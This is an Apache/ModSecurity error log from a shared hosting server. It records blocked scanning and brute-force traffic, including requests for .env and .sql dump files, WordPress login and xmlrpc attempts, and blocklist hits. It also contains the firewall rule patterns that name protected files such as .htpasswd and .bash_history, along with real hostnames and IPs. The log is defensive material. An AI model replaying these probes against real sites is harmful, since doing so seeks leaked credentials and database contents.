[Tue May 26 13:42:42.229440 2026] [security2:error] [pid 544395:tid 544427] [remote 74.7.241.58:53410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVV-hmrs7g3RMCdp8XXfQAAZB8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 13:42:43.729732 2026] [security2:error] [pid 544395:tid 544644] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV-xmrs7g3RMCdp8XXlgAAAHc"]
[Tue May 26 13:42:44.409324 2026] [security2:error] [pid 544395:tid 544561] [client 89.221.204.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVV-xmrs7g3RMCdp8XXkAAAACQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:42:45.488796 2026] [security2:error] [pid 544395:tid 544526] [client 123.28.177.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV_Rmrs7g3RMCdp8XXtAAAAAE"]
[Tue May 26 13:42:45.528558 2026] [security2:error] [pid 544395:tid 544627] [client 14.183.182.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php/2016/02/10/reverse-engineering-an-existing-database-using-the-hibernate-maven-plug-in/"] [unique_id "ahVV_Bmrs7g3RMCdp8XXnwAAAGY"]
[Tue May 26 13:42:45.528990 2026] [security2:error] [pid 536875:tid 537092] [client 14.183.182.215:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php/2016/02/10/reverse-engineering-an-existing-database-using-the-hibernate-maven-plug-in/"] [unique_id "ahVV--r_-FTveSGlx1H0KgAAANw"]
[Tue May 26 13:42:45.795517 2026] [security2:error] [pid 544395:tid 544565] [client 89.221.204.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVV_Rmrs7g3RMCdp8XXvwAAACg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 13:42:46.012952 2026] [security2:error] [pid 544395:tid 544531] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV_Rmrs7g3RMCdp8XXvQAAAAY"]
[Tue May 26 13:42:46.347757 2026] [security2:error] [pid 544395:tid 544460] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/database.sql"] [unique_id "ahVV_hmrs7g3RMCdp8XX1AAAXEA"]
[Tue May 26 13:42:46.485039 2026] [security2:error] [pid 544395:tid 544540] [client 176.65.139.238:41516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.quickdeliveryexp.com"] [uri "/.env"] [unique_id "ahVV_hmrs7g3RMCdp8XX2AAAAA8"]
[Tue May 26 13:42:46.635017 2026] [security2:error] [pid 544395:tid 544464] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/dump.sql"] [unique_id "ahVV_hmrs7g3RMCdp8XX2QAAHkQ"]
[Tue May 26 13:42:47.299756 2026] [security2:error] [pid 544395:tid 544465] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/backup.sql"] [unique_id "ahVV_xmrs7g3RMCdp8XX7QAAAEU"]
[Tue May 26 13:42:47.770930 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV_-r_-FTveSGlx1H0SwAAAOs"]
[Tue May 26 13:42:47.806985 2026] [security2:error] [pid 544395:tid 544504] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/db.sql"] [unique_id "ahVV_xmrs7g3RMCdp8XX8QAATGw"]
[Tue May 26 13:42:48.189110 2026] [security2:error] [pid 536875:tid 537101] [client 129.222.147.134:57154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWAOr_-FTveSGlx1H0WAAAAOU"]
[Tue May 26 13:42:48.192555 2026] [security2:error] [pid 536875:tid 537101] [client 129.222.147.134:57154] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWAOr_-FTveSGlx1H0WAAAAOU"]
[Tue May 26 13:42:48.846056 2026] [security2:error] [pid 544395:tid 544594] [client 3.237.65.43:59486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/images/images/cache.php"] [unique_id "ahVWABmrs7g3RMCdp8XYAgAAAEU"], referer: www.google.com
[Tue May 26 13:42:48.953888 2026] [security2:error] [pid 536875:tid 537020] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWAOr_-FTveSGlx1H0XgAAAJQ"]
[Tue May 26 13:42:50.108929 2026] [security2:error] [pid 544395:tid 544621] [client 106.192.248.115:51577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWAhmrs7g3RMCdp8XYGAAAAGA"]
[Tue May 26 13:42:50.109071 2026] [security2:error] [pid 544395:tid 544621] [client 106.192.248.115:51577] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWAhmrs7g3RMCdp8XYGAAAAGA"]
[Tue May 26 13:42:50.168098 2026] [security2:error] [pid 544395:tid 544480] [remote 88.198.91.116:44956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVWARmrs7g3RMCdp8XYFQAACFQ"]
[Tue May 26 13:42:50.642918 2026] [security2:error] [pid 536875:tid 537070] [client 89.221.204.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVWAur_-FTveSGlx1H0bwAAAMY"], referer: https://anujtradingco.com
[Tue May 26 13:42:50.997348 2026] [security2:error] [pid 544395:tid 544589] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWAhmrs7g3RMCdp8XYIwAAAEA"]
[Tue May 26 13:42:52.165600 2026] [security2:error] [pid 544395:tid 544476] [remote 95.216.117.13:44390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVWAxmrs7g3RMCdp8XYMgAATFA"]
[Tue May 26 13:42:53.608698 2026] [security2:error] [pid 536875:tid 537042] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWBer_-FTveSGlx1H0lgAAAKo"]
[Tue May 26 13:42:54.392295 2026] [security2:error] [pid 544395:tid 544479] [remote 88.198.91.116:60732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVWBhmrs7g3RMCdp8XYWgAAYFM"]
[Tue May 26 13:42:54.845849 2026] [security2:error] [pid 536875:tid 537072] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWBur_-FTveSGlx1H0swAAAMg"]
[Tue May 26 13:42:57.140230 2026] [security2:error] [pid 536875:tid 536952] [remote 45.136.17.84:48580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.17.136.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVWCOr_-FTveSGlx1H03wAA3Uw"]
[Tue May 26 13:42:57.211359 2026] [security2:error] [pid 536875:tid 537084] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWCOr_-FTveSGlx1H02wAAANQ"]
[Tue May 26 13:42:58.324721 2026] [security2:error] [pid 544395:tid 544576] [client 114.119.143.104:36729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/robots.txt"] [unique_id "ahVWChmrs7g3RMCdp8XYiwAAADM"]
[Tue May 26 13:42:58.587666 2026] [security2:error] [pid 544395:tid 544622] [client 129.222.147.134:9219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWChmrs7g3RMCdp8XYjQAAAGE"]
[Tue May 26 13:42:58.587870 2026] [security2:error] [pid 544395:tid 544622] [client 129.222.147.134:9219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWChmrs7g3RMCdp8XYjQAAAGE"]
[Tue May 26 13:42:59.525202 2026] [autoindex:error] [pid 536875:tid 537050] [client 101.33.81.73:53086] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:42:59.683333 2026] [security2:error] [pid 536875:tid 537019] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWC-r_-FTveSGlx1H0_wAAAJM"]
[Tue May 26 13:43:00.583586 2026] [security2:error] [pid 544395:tid 544529] [client 106.192.248.115:51891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWDBmrs7g3RMCdp8XYrAAAAAQ"]
[Tue May 26 13:43:00.588864 2026] [security2:error] [pid 544395:tid 544529] [client 106.192.248.115:51891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWDBmrs7g3RMCdp8XYrAAAAAQ"]
[Tue May 26 13:43:01.352371 2026] [security2:error] [pid 536875:tid 537008] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWDOr_-FTveSGlx1H1IAAAAIg"]
[Tue May 26 13:43:02.187846 2026] [security2:error] [pid 544395:tid 544568] [client 66.249.66.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVWDRmrs7g3RMCdp8XYyQAAACs"]
[Tue May 26 13:43:03.301530 2026] [security2:error] [pid 544395:tid 544645] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWDhmrs7g3RMCdp8XY2gAAAHg"]
[Tue May 26 13:43:05.156350 2026] [security2:error] [pid 536875:tid 537067] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWEOr_-FTveSGlx1H1PQAAAMM"]
[Tue May 26 13:43:06.570801 2026] [security2:error] [pid 544395:tid 544582] [client 136.243.228.198:42405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/products.php"] [unique_id "ahVWEhmrs7g3RMCdp8XZCwAAADk"]
[Tue May 26 13:43:08.407869 2026] [security2:error] [pid 536875:tid 537025] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWE-r_-FTveSGlx1H1iAAAAJk"]
[Tue May 26 13:43:08.449809 2026] [security2:error] [pid 544395:tid 544575] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWFBmrs7g3RMCdp8XZJwAAADI"]
[Tue May 26 13:43:08.720432 2026] [security2:error] [pid 536875:tid 537092] [client 129.222.147.134:65486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWFOr_-FTveSGlx1H1lgAAANw"]
[Tue May 26 13:43:08.720548 2026] [security2:error] [pid 536875:tid 537092] [client 129.222.147.134:65486] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWFOr_-FTveSGlx1H1lgAAANw"]
[Tue May 26 13:43:09.504639 2026] [security2:error] [pid 544395:tid 544624] [client 186.130.158.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWFRmrs7g3RMCdp8XZPwAAAGM"]
[Tue May 26 13:43:09.865346 2026] [security2:error] [pid 544395:tid 544507] [remote 46.62.185.67:50620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVWFRmrs7g3RMCdp8XZRwAALm8"]
[Tue May 26 13:43:10.645769 2026] [security2:error] [pid 544395:tid 544603] [client 136.243.228.198:19980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/index.php"] [unique_id "ahVWFhmrs7g3RMCdp8XZWgAAAE4"]
[Tue May 26 13:43:10.801940 2026] [security2:error] [pid 544395:tid 544529] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWFhmrs7g3RMCdp8XZVwAAAAQ"]
[Tue May 26 13:43:11.141770 2026] [security2:error] [pid 544395:tid 544591] [client 106.192.248.115:52199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWFxmrs7g3RMCdp8XZZgAAAEI"]
[Tue May 26 13:43:11.142576 2026] [security2:error] [pid 544395:tid 544591] [client 106.192.248.115:52199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWFxmrs7g3RMCdp8XZZgAAAEI"]
[Tue May 26 13:43:11.591255 2026] [core:crit] [pid 544395:tid 544552] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:12.965654 2026] [security2:error] [pid 536875:tid 537067] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWGOr_-FTveSGlx1H1wQAAAMM"]
[Tue May 26 13:43:13.447502 2026] [security2:error] [pid 544395:tid 544646] [client 34.75.119.88:53250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.119.75.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rabbanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVWGRmrs7g3RMCdp8XZjwAAAHk"]
[Tue May 26 13:43:13.743862 2026] [security2:error] [pid 544395:tid 544610] [client 34.75.119.88:64046] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGRmrs7g3RMCdp8XZlwAAAFU"]
[Tue May 26 13:43:14.037948 2026] [security2:error] [pid 536875:tid 537006] [client 34.75.119.88:59602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGur_-FTveSGlx1H10gAAAIY"]
[Tue May 26 13:43:14.245562 2026] [security2:error] [pid 544395:tid 544549] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWGRmrs7g3RMCdp8XZmQAAABg"]
[Tue May 26 13:43:14.384837 2026] [security2:error] [pid 536875:tid 537073] [client 34.75.119.88:53489] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGur_-FTveSGlx1H11gAAAMk"]
[Tue May 26 13:43:14.687308 2026] [security2:error] [pid 544395:tid 544650] [client 34.75.119.88:57300] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGhmrs7g3RMCdp8XZqQAAAH0"]
[Tue May 26 13:43:14.963008 2026] [security2:error] [pid 536875:tid 537070] [client 136.243.228.198:34625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/about.php"] [unique_id "ahVWGur_-FTveSGlx1H14AAAAMY"]
[Tue May 26 13:43:14.987348 2026] [security2:error] [pid 536875:tid 537112] [client 34.75.119.88:51842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGur_-FTveSGlx1H14QAAAPA"]
[Tue May 26 13:43:15.283743 2026] [core:crit] [pid 536875:tid 537085] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:15.299282 2026] [security2:error] [pid 536875:tid 537126] [client 34.75.119.88:58438] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVWG-r_-FTveSGlx1H16AAAAP4"]
